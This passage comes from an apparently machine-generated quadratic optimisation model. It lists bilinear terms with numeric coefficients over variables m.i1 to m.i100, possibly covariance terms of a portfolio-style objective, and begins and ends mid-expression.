+ 0.00119092*m.i1*m.i29 + 0.01373684*m.i1*m.i30 + 0.0059113*m.i1*m.i31 + 0.00623524*m.i1*m.i32
+ 0.00801204*m.i1*m.i33 + 0.00108736*m.i1*m.i34 + 0.001491474*m.i1*m.i35 + 0.01080356*m.i1*m.i36
+ 0.00559202*m.i1*m.i37 + 7.8057e-6*m.i1*m.i38 + 0.00831004*m.i1*m.i39 + 0.001096208*m.i1*m.i40
+ 0.001136658*m.i1*m.i41 + 0.0073715*m.i1*m.i42 + 0.000726938*m.i1*m.i43 + 0.00621872*m.i1*m.i44
+ 0.00646596*m.i1*m.i45 + 0.00441466*m.i1*m.i46 + 0.001262528*m.i1*m.i47 + 0.00567366*m.i1*m.i48
+ 0.00690472*m.i1*m.i49 + 0.01140754*m.i1*m.i50 + 0.00275514*m.i1*m.i51 + 0.00633434*m.i1*m.i52
+ 0.00842252*m.i1*m.i53 + 0.00674544*m.i1*m.i54 + 0.00577156*m.i1*m.i55 + 0.000723972*m.i1*m.i56
+ 0.00617654*m.i1*m.i57 + 0.00426758*m.i1*m.i58 + 0.00581362*m.i1*m.i59 + 0.00305964*m.i1*m.i60
+ 0.00915838*m.i1*m.i61 + 0.00408204*m.i1*m.i62 + 0.00526036*m.i1*m.i63 + 0.00641708*m.i1*m.i64
+ 0.001311362*m.i1*m.i65 + 0.00589896*m.i1*m.i66 + 0.001450664*m.i1*m.i67 + 0.0054669*m.i1*m.i68
+ 0.00759698*m.i1*m.i69 + 0.0069591*m.i1*m.i70 + 0.0023689*m.i1*m.i71 + 0.0026146*m.i1*m.i72 +
0.00520422*m.i1*m.i73 + 0.00959956*m.i1*m.i74 + 0.00799166*m.i1*m.i75 + 0.00256248*m.i1*m.i76 +
0.01210352*m.i1*m.i77 + 0.00469514*m.i1*m.i78 + 0.00329676*m.i1*m.i79 + 0.0068214*m.i1*m.i80 +
0.00190637*m.i1*m.i81 + 0.00256972*m.i1*m.i82 - 0.00577696*m.i1*m.i83 + 0.00245394*m.i1*m.i84 +
0.00585966*m.i1*m.i85 + 0.00330078*m.i1*m.i86 + 0.00362852*m.i1*m.i87 + 0.0064137*m.i1*m.i88 +
0.00375038*m.i1*m.i89 + 0.00666048*m.i1*m.i90 + 0.00942176*m.i1*m.i91 + 0.00379828*m.i1*m.i92 +
0.00246526*m.i1*m.i93 + 0.0029997*m.i1*m.i94 + 0.00592606*m.i1*m.i95 + 0.0136565*m.i1*m.i96 +
0.00562112*m.i1*m.i97 + 0.0031101*m.i1*m.i98 + 0.00328418*m.i1*m.i99 + 0.00992138*m.i1*m.i100 +
0.01159836*m.i2*m.i3 + 0.00432612*m.i2*m.i4 + 0.01055774*m.i2*m.i5 + 0.0235592*m.i2*m.i6 +
0.0053913*m.i2*m.i7 + 0.01748966*m.i2*m.i8 + 0.01322526*m.i2*m.i9 + 0.01103896*m.i2*m.i10 +
0.001420928*m.i2*m.i11 + 0.00303766*m.i2*m.i12 + 0.0325414*m.i2*m.i13 + 0.0528886*m.i2*m.i14 +
0.0344486*m.i2*m.i15 + 0.01889664*m.i2*m.i16 + 0.01085498*m.i2*m.i17 + 0.01133696*m.i2*m.i18 +
0.0105108*m.i2*m.i19 + 0.041965*m.i2*m.i20 + 0.01908526*m.i2*m.i21 + 0.0438608*m.i2*m.i22 +
0.01760436*m.i2*m.i23 + 0.0177692*m.i2*m.i24 + 0.01401386*m.i2*m.i25 + 0.01130076*m.i2*m.i26 +
0.0201926*m.i2*m.i27 + 0.00893526*m.i2*m.i28 + 0.01013464*m.i2*m.i29 + 0.0522552*m.i2*m.i30 +
0.00674062*m.i2*m.i31 + 0.0386894*m.i2*m.i32 + 0.01840562*m.i2*m.i33 + 0.0079061*m.i2*m.i34 +
0.01050574*m.i2*m.i35 + 0.038882*m.i2*m.i36 + 0.0209782*m.i2*m.i37 + 0.00569346*m.i2*m.i38 +
0.0259324*m.i2*m.i39 + 0.0472088*m.i2*m.i40 + 0.0282636*m.i2*m.i41 + 0.0225892*m.i2*m.i42 +
0.01104052*m.i2*m.i43 + 0.0218496*m.i2*m.i44 + 0.00682534*m.i2*m.i45 + 0.01022898*m.i2*m.i46 +
0.0273094*m.i2*m.i47 + 0.01045064*m.i2*m.i48 + 0.01767338*m.i2*m.i49 + 0.0311902*m.i2*m.i50 +
0.0126455*m.i2*m.i51 + 0.0206168*m.i2*m.i52 + 0.0261894*m.i2*m.i53 + 0.024527*m.i2*m.i54 +
0.01734138*m.i2*m.i55 + 0.01224052*m.i2*m.i56 + 0.01152072*m.i2*m.i57 + 0.01028864*m.i2*m.i58 +
0.01883544*m.i2*m.i59 + 0.00908648*m.i2*m.i60 + 0.0449708*m.i2*m.i61 + 0.0363664*m.i2*m.i62 +
0.01577062*m.i2*m.i63 + 0.01266282*m.i2*m.i64 + 0.01385216*m.i2*m.i65 + 0.00440902*m.i2*m.i66 +
0.01711764*m.i2*m.i67 + 0.0110787*m.i2*m.i68 + 0.0341778*m.i2*m.i69 + 0.0156542*m.i2*m.i70 +
0.01891112*m.i2*m.i71 + 0.0216326*m.i2*m.i72 + 0.01534328*m.i2*m.i73 + 0.01661334*m.i2*m.i74 +
0.01534594*m.i2*m.i75 + 0.01116732*m.i2*m.i76 + 0.01402982*m.i2*m.i77 + 0.00963242*m.i2*m.i78 +
0.0200668*m.i2*m.i79 + 0.01379116*m.i2*m.i80 + 0.01910046*m.i2*m.i81 + 0.0077605*m.i2*m.i82 -
0.000954558*m.i2*m.i83 + 0.01255918*m.i2*m.i84 + 0.0126639*m.i2*m.i85 + 0.0201936*m.i2*m.i86 +
0.017931*m.i2*m.i87 + 0.0389418*m.i2*m.i88 + 0.00845916*m.i2*m.i89 + 0.0267914*m.i2*m.i90 +
0.0193905*m.i2*m.i91 + 0.01261014*m.i2*m.i92 + 0.0069012*m.i2*m.i93 + 0.00876014*m.i2*m.i94 +
0.01829908*m.i2*m.i95 + 0.0373396*m.i2*m.i96 + 0.0211262*m.i2*m.i97 + 0.01549032*m.i2*m.i98 +
0.0247114*m.i2*m.i99 + 0.0324248*m.i2*m.i100 - 0.000720538*m.i3*m.i4 + 0.00453322*m.i3*m.i5 +
0.00638226*m.i3*m.i6 + 0.000938158*m.i3*m.i7 + 0.0035154*m.i3*m.i8 + 0.00681962*m.i3*m.i9 +
0.006345*m.i3*m.i10 + 0.00232904*m.i3*m.i11 - 0.00054599*m.i3*m.i12 + 0.01850556*m.i3*m.i13 +
0.01892336*m.i3*m.i14 + 0.00820906*m.i3*m.i15 + 0.00848796*m.i3*m.i16 + 0.0100743*m.i3*m.i17 +
0.00327798*m.i3*m.i18 + 0.000498452*m.i3*m.i19 + 0.01775572*m.i3*m.i20 + 0.00919688*m.i3*m.i21 +
0.01282772*m.i3*m.i22 + 0.00853066*m.i3*m.i23 + 0.00506148*m.i3*m.i24 + 0.004557*m.i3*m.i25 +
0.001737768*m.i3*m.i26 + 0.00560326*m.i3*m.i27 + 0.00374962*m.i3*m.i28 + 0.000427408*m.i3*m.i29
+ 0.01831098*m.i3*m.i30 + 0.00791496*m.i3*m.i31 + 0.01306*m.i3*m.i32 + 0.0143109*m.i3*m.i33 +
0.00324578*m.i3*m.i34 + 0.00289704*m.i3*m.i35 + 0.01899172*m.i3*m.i36 + 0.00855898*m.i3*m.i37 +
0.000764782*m.i3*m.i38 + 0.01045622*m.i3*m.i39 + 0.0241684*m.i3*m.i40 + 0.01022702*m.i3*m.i41 +
0.0096569*m.i3*m.i42 + 0.00605256*m.i3*m.i43 + 0.0087656*m.i3*m.i44 + 0.00231868*m.i3*m.i45 +
0.003075*m.i3*m.i46 + 0.00904418*m.i3*m.i47 + 0.00346386*m.i3*m.i48 + 0.00970054*m.i3*m.i49 +
0.0107517*m.i3*m.i50 + 0.00833706*m.i3*m.i51 + 0.00601022*m.i3*m.i52 + 0.00885472*m.i3*m.i53 +
0.0087269*m.i3*m.i54 + 0.00799796*m.i3*m.i55 + 0.0077742*m.i3*m.i56 + 0.00233028*m.i3*m.i57 +
0.00392772*m.i3*m.i58 + 0.00960436*m.i3*m.i59 + 0.000506858*m.i3*m.i60 + 0.01485036*m.i3*m.i61 +
0.01172454*m.i3*m.i62 + 0.00763564*m.i3*m.i63 + 0.00510368*m.i3*m.i64 + 0.00739458*m.i3*m.i65 +
0.00321864*m.i3*m.i66 + 0.00506992*m.i3*m.i67 + 0.001582392*m.i3*m.i68 + 0.0133327*m.i3*m.i69 +
0.00346984*m.i3*m.i70 + 0.00591914*m.i3*m.i71 + 0.0050918*m.i3*m.i72 + 0.00762942*m.i3*m.i73 +
0.0072567*m.i3*m.i74 + 0.0028432*m.i3*m.i75 + 0.00258746*m.i3*m.i76 + 0.00665946*m.i3*m.i77 +
0.001559716*m.i3*m.i78 + 0.0114221*m.i3*m.i79 + 0.00359546*m.i3*m.i80 + 0.00675946*m.i3*m.i81 +
0.001328782*m.i3*m.i82 + 0.00450512*m.i3*m.i83 + 0.00859628*m.i3*m.i84 + 0.00541618*m.i3*m.i85 +
0.01126372*m.i3*m.i86 + 0.00604642*m.i3*m.i87 + 0.01802074*m.i3*m.i88 + 0.0056414*m.i3*m.i89 +
0.00952436*m.i3*m.i90 + 0.00568388*m.i3*m.i91 + 0.0086732*m.i3*m.i92 + 0.001482822*m.i3*m.i93 +
0.0026677*m.i3*m.i94 + 0.00675394*m.i3*m.i95 + 0.01169216*m.i3*m.i96 + 0.0076724*m.i3*m.i97 +
0.00761804*m.i3*m.i98 + 0.01192344*m.i3*m.i99 + 0.01326866*m.i3*m.i100 + 0.00169903*m.i4*m.i5 +
0.00300136*m.i4*m.i6 + 0.00385392*m.i4*m.i7 + 0.00382362*m.i4*m.i8 + 0.00575034*m.i4*m.i9 +
0.00125203*m.i4*m.i10 + 0.000828078*m.i4*m.i11 + 0.00404896*m.i4*m.i12 - 0.001180878*m.i4*m.i13
+ 0.00956206*m.i4*m.i14 + 0.00571904*m.i4*m.i15 + 0.0047927*m.i4*m.i16 + 0.001736122*m.i4*m.i17
+ 0.001900434*m.i4*m.i18 + 0.00498296*m.i4*m.i19 + 0.0055112*m.i4*m.i20 + 0.00199047*m.i4*m.i21
+ 0.00302926*m.i4*m.i22 + 0.001107052*m.i4*m.i23 + 0.0032099*m.i4*m.i24 + 0.00202704*m.i4*m.i25
+ 0.0049441*m.i4*m.i26 + 0.00296714*m.i4*m.i27 + 0.001430786*m.i4*m.i28 + 0.00335542*m.i4*m.i29
+ 0.0072271*m.i4*m.i30 + 0.001983328*m.i4*m.i31 + 0.00263338*m.i4*m.i32 + 0.0034098*m.i4*m.i33
+ 0.001978102*m.i4*m.i34 + 0.00248436*m.i4*m.i35 + 0.001037234*m.i4*m.i36 + 0.001931824*m.i4*
m.i37 + 0.00154955*m.i4*m.i38 + 0.00293776*m.i4*m.i39 - 0.01282698*m.i4*m.i40 + 0.001937926*m.i4*
m.i41 + 0.0052959*m.i4*m.i42 + 0.001856036*m.i4*m.i43 + 0.000740384*m.i4*m.i44 + 0.00372246*m.i4*
m.i45 + 0.00362974*m.i4*m.i46 + 0.001687258*m.i4*m.i47 + 0.00297792*m.i4*m.i48 + 0.0024381*m.i4*
m.i49 + 0.00581304*m.i4*m.i50 + 0.000775592*m.i4*m.i51 + 0.00512872*m.i4*m.i52 + 0.00302932*m.i4*
m.i53 + 0.00451004*m.i4*m.i54 + 0.00355054*m.i4*m.i55 + 0.000365898*m.i4*m.i56 + 0.00396452*m.i4*
m.i57 + 0.00218522*m.i4*m.i58 + 0.001602712*m.i4*m.i59 + 0.00378946*m.i4*m.i60 + 0.00528342*m.i4*
m.i61 + 0.00345546*m.i4*m.i62 + 0.0072364*m.i4*m.i63 + 0.00460504*m.i4*m.i64 + 0.00362066*m.i4*
m.i65 + 0.00176825*m.i4*m.i66 + 0.00326082*m.i4*m.i67 + 0.00494324*m.i4*m.i68 + 0.00478058*m.i4*
m.i69 + 0.0047424*m.i4*m.i70 + 0.00406804*m.i4*m.i71 + 0.00356438*m.i4*m.i72 + 0.0039191*m.i4*
m.i73 + 0.00506266*m.i4*m.i74 + 0.005213*m.i4*m.i75 + 0.00334114*m.i4*m.i76 + 0.00410168*m.i4*
m.i77 + 0.00325268*m.i4*m.i78 + 0.000621396*m.i4*m.i79 + 0.00679868*m.i4*m.i80 + 0.001665408*m.i4
*m.i81 + 0.00231708*m.i4*m.i82 - 0.0025243*m.i4*m.i83 + 0.00277762*m.i4*m.i84 + 0.0040202*m.i4*
m.i85 + 0.001500566*m.i4*m.i86 + 0.001680814*m.i4*m.i87 + 0.00640404*m.i4*m.i88 + 0.00397656*m.i4
*m.i89 + 0.000508164*m.i4*m.i90 + 0.00565534*m.i4*m.i91 + 0.0031999*m.i4*m.i92 + 0.0007233*m.i4*
m.i93 + 0.001347788*m.i4*m.i94 + 0.00386662*m.i4*m.i95 + 0.0056032*m.i4*m.i96 + 0.00392786*m.i4*
m.i97 + 0.0032706*m.i4*m.i98 + 0.000716722*m.i4*m.i99 + 0.00200998*m.i4*m.i100 + 0.00725878*m.i5*
m.i6 + 0.000634496*m.i5*m.i7 + 0.0112129*m.i5*m.i8 + 0.006535*m.i5*m.i9 + 0.0076756*m.i5*m.i10 -
0.00455426*m.i5*m.i11 + 0.001111236*m.i5*m.i12 + 0.01473142*m.i5*m.i13 + 0.01556352*m.i5*m.i14 +
0.00889148*m.i5*m.i15 + 0.00833956*m.i5*m.i16 + 0.01155304*m.i5*m.i17 + 0.0044319*m.i5*m.i18 +
0.0061696*m.i5*m.i19 + 0.01660846*m.i5*m.i20 + 0.00921042*m.i5*m.i21 + 0.01240074*m.i5*m.i22 +
0.00930536*m.i5*m.i23 + 0.00636938*m.i5*m.i24 + 0.00582298*m.i5*m.i25 + 0.00314834*m.i5*m.i26 +
0.00569034*m.i5*m.i27 + 0.00513186*m.i5*m.i28 + 0.00443806*m.i5*m.i29 + 0.01398194*m.i5*m.i30 +
0.00649478*m.i5*m.i31 + 0.01579432*m.i5*m.i32 + 0.00734872*m.i5*m.i33 + 0.0056108*m.i5*m.i34 +
0.00623672*m.i5*m.i35 + 0.01544598*m.i5*m.i36 + 0.01144796*m.i5*m.i37 + 0.0024117*m.i5*m.i38 +
0.00970728*m.i5*m.i39 + 0.0182302*m.i5*m.i40 + 0.00790876*m.i5*m.i41 + 0.00731488*m.i5*m.i42 +
0.00543454*m.i5*m.i43 + 0.00647722*m.i5*m.i44 + 0.0035064*m.i5*m.i45 + 0.00307696*m.i5*m.i46 +
0.00716814*m.i5*m.i47 + 0.001828662*m.i5*m.i48 + 0.00846664*m.i5*m.i49 + 0.01292148*m.i5*m.i50 +
0.0081737*m.i5*m.i51 + 0.00647086*m.i5*m.i52 + 0.00609644*m.i5*m.i53 + 0.00842446*m.i5*m.i54 +
0.00619594*m.i5*m.i55 + 0.01114364*m.i5*m.i56 + 0.00464056*m.i5*m.i57 + 0.00294786*m.i5*m.i58 +
0.01085566*m.i5*m.i59 + 0.00324938*m.i5*m.i60 + 0.01321296*m.i5*m.i61 + 0.00956118*m.i5*m.i62 +
0.00799502*m.i5*m.i63 + 0.00255928*m.i5*m.i64 + 0.00635808*m.i5*m.i65 + 0.00425494*m.i5*m.i66 +
0.00743456*m.i5*m.i67 + 0.003997*m.i5*m.i68 + 0.01327542*m.i5*m.i69 + 0.00624764*m.i5*m.i70 +
0.00544782*m.i5*m.i71 + 0.00583882*m.i5*m.i72 + 0.00712322*m.i5*m.i73 + 0.00675538*m.i5*m.i74 +
0.00471928*m.i5*m.i75 + 0.00331686*m.i5*m.i76 + 0.0064726*m.i5*m.i77 + 0.0043073*m.i5*m.i78 +
0.01376458*m.i5*m.i79 + 0.00590054*m.i5*m.i80 + 0.00544478*m.i5*m.i81 + 0.00433406*m.i5*m.i82 +
0.0018936*m.i5*m.i83 + 0.00732892*m.i5*m.i84 + 0.00654804*m.i5*m.i85 + 0.00769986*m.i5*m.i86 +
0.00924248*m.i5*m.i87 + 0.01858866*m.i5*m.i88 + 0.00588762*m.i5*m.i89 + 0.00671372*m.i5*m.i90 +
0.00513832*m.i5*m.i91 + 0.00597632*m.i5*m.i92 + 0.0033572*m.i5*m.i93 + 0.00718978*m.i5*m.i94 +
0.00692006*m.i5*m.i95 + 0.0082357*m.i5*m.i96 + 0.00798976*m.i5*m.i97 + 0.00578018*m.i5*m.i98 +
0.00997244*m.i5*m.i99 + 0.00861536*m.i5*m.i100 + 0.00682146*m.i6*m.i7 + 0.00318158*m.i6*m.i8 +
0.01402384*m.i6*m.i9 + 0.01146794*m.i6*m.i10 + 0.00514562*m.i6*m.i11 + 0.001749894*m.i6*m.i12 +
0.0349226*m.i6*m.i13 + 0.0204032*m.i6*m.i14 + 0.0257432*m.i6*m.i15 + 0.01758104*m.i6*m.i16 +
0.01908054*m.i6*m.i17 + 0.00928378*m.i6*m.i18 + 0.00320468*m.i6*m.i19 + 0.0315536*m.i6*m.i20 +
0.01792788*m.i6*m.i21 + 0.0231518*m.i6*m.i22 + 0.01485588*m.i6*m.i23 + 0.01959078*m.i6*m.i24 +
0.01015748*m.i6*m.i25 + 0.00771848*m.i6*m.i26 + 0.0203708*m.i6*m.i27 + 0.00861336*m.i6*m.i28 +
0.00733064*m.i6*m.i29 + 0.0211284*m.i6*m.i30 + 0.01136376*m.i6*m.i31 + 0.0298052*m.i6*m.i32 +
0.01763386*m.i6*m.i33 + 0.01196962*m.i6*m.i34 + 0.00970124*m.i6*m.i35 + 0.0426536*m.i6*m.i36 +
0.0162704*m.i6*m.i37 + 0.00511032*m.i6*m.i38 + 0.0211034*m.i6*m.i39 + 0.0536216*m.i6*m.i40 +
0.0314338*m.i6*m.i41 + 0.0212846*m.i6*m.i42 + 0.01544516*m.i6*m.i43 + 0.0203852*m.i6*m.i44 +
0.00711214*m.i6*m.i45 + 0.01012528*m.i6*m.i46 + 0.0378006*m.i6*m.i47 + 0.00769828*m.i6*m.i48 +
0.01043538*m.i6*m.i49 + 0.0235092*m.i6*m.i50 + 0.00574084*m.i6*m.i51 + 0.01540822*m.i6*m.i52 +
0.01066192*m.i6*m.i53 + 0.01947344*m.i6*m.i54 + 0.01212224*m.i6*m.i55 + 0.01841288*m.i6*m.i56 +
0.00863178*m.i6*m.i57 + 0.0123986*m.i6*m.i58 + 0.01033934*m.i6*m.i59 + 0.00473636*m.i6*m.i60 +
0.0271978*m.i6*m.i61 + 0.0244978*m.i6*m.i62 + 0.0206042*m.i6*m.i63 + 0.0123061*m.i6*m.i64 +
0.00969592*m.i6*m.i65 + 0.0105285*m.i6*m.i66 + 0.01296694*m.i6*m.i67 + 0.00467684*m.i6*m.i68 +
0.0206522*m.i6*m.i69 + 0.01181216*m.i6*m.i70 + 0.034569*m.i6*m.i71 + 0.01713412*m.i6*m.i72 +
0.00997084*m.i6*m.i73 + 0.00934556*m.i6*m.i74 + 0.00446476*m.i6*m.i75 + 0.00591468*m.i6*m.i76 +
0.00902732*m.i6*m.i77 + 0.00684842*m.i6*m.i78 + 0.000346556*m.i6*m.i79 + 0.01344964*m.i6*m.i80 +
0.028585*m.i6*m.i81 + 0.00365848*m.i6*m.i82 + 0.0233826*m.i6*m.i83 + 0.01097966*m.i6*m.i84 +
0.01159854*m.i6*m.i85 + 0.0132315*m.i6*m.i86 + 0.00973116*m.i6*m.i87 + 0.01749474*m.i6*m.i88 +
0.00153948*m.i6*m.i89 + 0.01386412*m.i6*m.i90 + 0.01199914*m.i6*m.i91 + 0.0141917*m.i6*m.i92 +
0.001321806*m.i6*m.i93 + 0.00438272*m.i6*m.i94 + 0.01131596*m.i6*m.i95 + 0.01535776*m.i6*m.i96 +
0.01709068*m.i6*m.i97 + 0.024088*m.i6*m.i98 + 0.0176488*m.i6*m.i99 + 0.0244376*m.i6*m.i100 +
0.00488516*m.i7*m.i8 + 0.00626372*m.i7*m.i9 + 0.001990118*m.i7*m.i10 + 0.00360408*m.i7*m.i11 +
0.0044488*m.i7*m.i12 + 0.00345036*m.i7*m.i13 + 0.01022598*m.i7*m.i14 + 0.00914736*m.i7*m.i15 +
0.00744612*m.i7*m.i16 + 0.0041386*m.i7*m.i17 + 0.00439536*m.i7*m.i18 + 0.00478826*m.i7*m.i19 +
0.00946126*m.i7*m.i20 + 0.00383118*m.i7*m.i21 + 0.00577738*m.i7*m.i22 + 0.0023517*m.i7*m.i23 +
0.0050588*m.i7*m.i24 + 0.0021953*m.i7*m.i25 + 0.00304582*m.i7*m.i26 + 0.0025687*m.i7*m.i27 +
0.001019412*m.i7*m.i28 + 0.001803492*m.i7*m.i29 + 0.00840076*m.i7*m.i30 + 0.00405006*m.i7*m.i31
+ 0.00330894*m.i7*m.i32 + 0.00379124*m.i7*m.i33 + 0.00297878*m.i7*m.i34 + 0.00257924*m.i7*m.i35
+ 0.00710268*m.i7*m.i36 + 0.00290856*m.i7*m.i37 + 0.00084645*m.i7*m.i38 + 0.00616224*m.i7*m.i39
+ 0.00012188*m.i7*m.i40 + 0.00931498*m.i7*m.i41 + 0.00783*m.i7*m.i42 + 0.00769852*m.i7*m.i43 +
0.00783756*m.i7*m.i44 + 0.0049081*m.i7*m.i45 + 0.00379762*m.i7*m.i46 + 0.00691856*m.i7*m.i47 +
0.00516014*m.i7*m.i48 + 0.00525658*m.i7*m.i49 + 0.00529626*m.i7*m.i50 + 0.00103022*m.i7*m.i51 +
0.00545452*m.i7*m.i52 + 0.00609146*m.i7*m.i53 + 0.0066465*m.i7*m.i54 + 0.0057959*m.i7*m.i55 +
0.00384568*m.i7*m.i56 + 0.00518642*m.i7*m.i57 + 0.0049888*m.i7*m.i58 + 0.00240984*m.i7*m.i59 +
0.001870666*m.i7*m.i60 + 0.00856542*m.i7*m.i61 + 0.00433228*m.i7*m.i62 + 0.00926318*m.i7*m.i63 +
0.00802564*m.i7*m.i64 + 0.002679*m.i7*m.i65 + 0.00656044*m.i7*m.i66 + 0.00189873*m.i7*m.i67 +
0.00559974*m.i7*m.i68 + 0.0059088*m.i7*m.i69 + 0.00502274*m.i7*m.i70 + 0.00714092*m.i7*m.i71 +
0.00451814*m.i7*m.i72 + 0.0055096*m.i7*m.i73 + 0.0054579*m.i7*m.i74 + 0.00428152*m.i7*m.i75 +
0.00201372*m.i7*m.i76 + 0.00763776*m.i7*m.i77 + 0.001767634*m.i7*m.i78 - 0.00404984*m.i7*m.i79 +
0.00693072*m.i7*m.i80 + 0.00453578*m.i7*m.i81 + 0.001431356*m.i7*m.i82 + 0.001000832*m.i7*m.i83
+ 0.00363592*m.i7*m.i84 + 0.00399748*m.i7*m.i85 + 0.00244412*m.i7*m.i86 - 0.00038172*m.i7*m.i87
+ 0.00670104*m.i7*m.i88 + 0.00351634*m.i7*m.i89 + 0.000192176*m.i7*m.i90 + 0.00766242*m.i7*m.i91
+ 0.00431432*m.i7*m.i92 + 0.00099522*m.i7*m.i93 + 0.00215394*m.i7*m.i94 + 0.00467712*m.i7*m.i95
+ 0.00551306*m.i7*m.i96 + 0.00524514*m.i7*m.i97 + 0.00715168*m.i7*m.i98 + 0.00269474*m.i7*m.i99
+ 0.006577*m.i7*m.i100 + 0.01497394*m.i8*m.i9 + 0.0108969*m.i8*m.i10 + 0.00659842*m.i8*m.i11 +
0.00635336*m.i8*m.i12 + 0.0313098*m.i8*m.i13 + 0.0387588*m.i8*m.i14 + 0.01963812*m.i8*m.i15 +
0.00587206*m.i8*m.i16 + 0.0158028*m.i8*m.i17 + 0.00433344*m.i8*m.i18 + 0.01027216*m.i8*m.i19 +
0.0310764*m.i8*m.i20 + 0.01480666*m.i8*m.i21 + 0.0292324*m.i8*m.i22 + 0.01097454*m.i8*m.i23 +
0.01637932*m.i8*m.i24 + 0.0081932*m.i8*m.i25 + 0.00625414*m.i8*m.i26 + 0.01206926*m.i8*m.i27 +
0.00960586*m.i8*m.i28 + 0.00767454*m.i8*m.i29 + 0.0389634*m.i8*m.i30 + 0.01047056*m.i8*m.i31 +
0.0243166*m.i8*m.i32 + 0.01490526*m.i8*m.i33 + 0.0048023*m.i8*m.i34 + 0.00582726*m.i8*m.i35 +
0.0310084*m.i8*m.i36 + 0.01520046*m.i8*m.i37 + 0.00435652*m.i8*m.i38 + 0.01820518*m.i8*m.i39 +
0.028962*m.i8*m.i40 + 0.0236162*m.i8*m.i41 + 0.0089807*m.i8*m.i42 + 0.01679084*m.i8*m.i43 +
0.01575264*m.i8*m.i44 - 0.00596962*m.i8*m.i45 + 0.0045504*m.i8*m.i46 + 0.0135935*m.i8*m.i47 +
0.00528224*m.i8*m.i48 + 0.01215584*m.i8*m.i49 + 0.01116408*m.i8*m.i50 + 0.00976906*m.i8*m.i51 +
0.01011206*m.i8*m.i52 + 0.0224104*m.i8*m.i53 + 0.01007602*m.i8*m.i54 + 0.01583128*m.i8*m.i55 +
0.00761084*m.i8*m.i56 + 0.00804396*m.i8*m.i57 + 0.01038608*m.i8*m.i58 + 0.01602498*m.i8*m.i59 +
0.00380248*m.i8*m.i60 + 0.0227414*m.i8*m.i61 + 0.0208778*m.i8*m.i62 + 0.01278874*m.i8*m.i63 +
0.00882622*m.i8*m.i64 + 0.01253422*m.i8*m.i65 + 0.00938202*m.i8*m.i66 + 0.0132364*m.i8*m.i67 +
0.00341364*m.i8*m.i68 + 0.0217686*m.i8*m.i69 + 0.01082106*m.i8*m.i70 + 0.0109575*m.i8*m.i71 +
0.01032418*m.i8*m.i72 + 0.01203924*m.i8*m.i73 + 0.01820078*m.i8*m.i74 + 0.00454846*m.i8*m.i75 +
0.00699592*m.i8*m.i76 + 0.017175*m.i8*m.i77 + 0.00418326*m.i8*m.i78 + 0.003044*m.i8*m.i79 +
0.00913958*m.i8*m.i80 + 0.01058642*m.i8*m.i81 + 0.00609436*m.i8*m.i82 + 0.00939194*m.i8*m.i83 +
0.01860882*m.i8*m.i84 + 0.00544766*m.i8*m.i85 + 0.00672898*m.i8*m.i86 + 0.00847128*m.i8*m.i87 +
0.0399532*m.i8*m.i88 + 0.00230258*m.i8*m.i89 + 0.00647968*m.i8*m.i90 + 0.00663734*m.i8*m.i91 +
0.00723392*m.i8*m.i92 + 0.0028363*m.i8*m.i93 + 0.01094692*m.i8*m.i94 + 0.01122622*m.i8*m.i95 +
0.01922686*m.i8*m.i96 + 0.0178042*m.i8*m.i97 + 0.00987488*m.i8*m.i98 + 0.0201768*m.i8*m.i99 +
0.00916962*m.i8*m.i100 + 0.00380196*m.i9*m.i10 + 0.000241806*m.i9*m.i11 + 0.00422182*m.i9*m.i12
+ 0.01745366*m.i9*m.i13 + 0.01560378*m.i9*m.i14 + 0.01797116*m.i9*m.i15 + 0.0104377*m.i9*m.i16
+ 0.01789532*m.i9*m.i17 + 0.0058031*m.i9*m.i18 + 0.00524852*m.i9*m.i19 + 0.0217664*m.i9*m.i20 +
0.0137801*m.i9*m.i21 + 0.00556924*m.i9*m.i22 + 0.00707894*m.i9*m.i23 + 0.00383446*m.i9*m.i24 +
0.00797136*m.i9*m.i25 + 0.00671112*m.i9*m.i26 + 0.00962638*m.i9*m.i27 + 0.00548282*m.i9*m.i28 +
0.00537842*m.i9*m.i29 + 0.01125578*m.i9*m.i30 + 0.01033708*m.i9*m.i31 + 0.01741482*m.i9*m.i32 +
0.01282666*m.i9*m.i33 + 0.00490948*m.i9*m.i34 + 0.00344028*m.i9*m.i35 + 0.01643714*m.i9*m.i36 +
0.00871578*m.i9*m.i37 + 0.002884*m.i9*m.i38 + 0.01596496*m.i9*m.i39 + 0.0171071*m.i9*m.i40 +
0.0282184*m.i9*m.i41 + 0.0157083*m.i9*m.i42 + 0.01908622*m.i9*m.i43 + 0.01887462*m.i9*m.i44 +
0.00621506*m.i9*m.i45 + 0.00706654*m.i9*m.i46 + 0.01685764*m.i9*m.i47 + 0.0046064*m.i9*m.i48 +
0.01393082*m.i9*m.i49 + 0.01366172*m.i9*m.i50 + 0.00974224*m.i9*m.i51 + 0.01117786*m.i9*m.i52 +
0.0105042*m.i9*m.i53 + 0.01603942*m.i9*m.i54 + 0.01154502*m.i9*m.i55 + 0.0187017*m.i9*m.i56 +
0.0063051*m.i9*m.i57 + 0.01180982*m.i9*m.i58 + 0.01148738*m.i9*m.i59 + 0.0045111*m.i9*m.i60 +
0.01782442*m.i9*m.i61 + 0.01261594*m.i9*m.i62 + 0.0275116*m.i9*m.i63 + 0.01370986*m.i9*m.i64 +
0.01301448*m.i9*m.i65 + 0.00909146*m.i9*m.i66 + 0.00880956*m.i9*m.i67 + 0.00542126*m.i9*m.i68 +
0.0173699*m.i9*m.i69 + 0.0063573*m.i9*m.i70 + 0.01464082*m.i9*m.i71 + 0.01030184*m.i9*m.i72 +
0.01342364*m.i9*m.i73 + 0.01050302*m.i9*m.i74 + 0.00580926*m.i9*m.i75 + 0.00669824*m.i9*m.i76 +
0.0154461*m.i9*m.i77 + 0.00331996*m.i9*m.i78 - 0.00117976*m.i9*m.i79 + 0.0134427*m.i9*m.i80 +
0.01200946*m.i9*m.i81 + 0.00261992*m.i9*m.i82 + 0.01802554*m.i9*m.i83 + 0.01281546*m.i9*m.i84 +
0.00817562*m.i9*m.i85 + 0.01353278*m.i9*m.i86 + 0.0065419*m.i9*m.i87 + 0.0287756*m.i9*m.i88 +
0.00438656*m.i9*m.i89 + 0.006514*m.i9*m.i90 + 0.00948704*m.i9*m.i91 + 0.01460712*m.i9*m.i92 +
0.00442406*m.i9*m.i93 + 0.00525338*m.i9*m.i94 + 0.01080594*m.i9*m.i95 + 0.007284*m.i9*m.i96 +
0.01145784*m.i9*m.i97 + 0.01167366*m.i9*m.i98 + 0.01306896*m.i9*m.i99 + 0.01230056*m.i9*m.i100 +
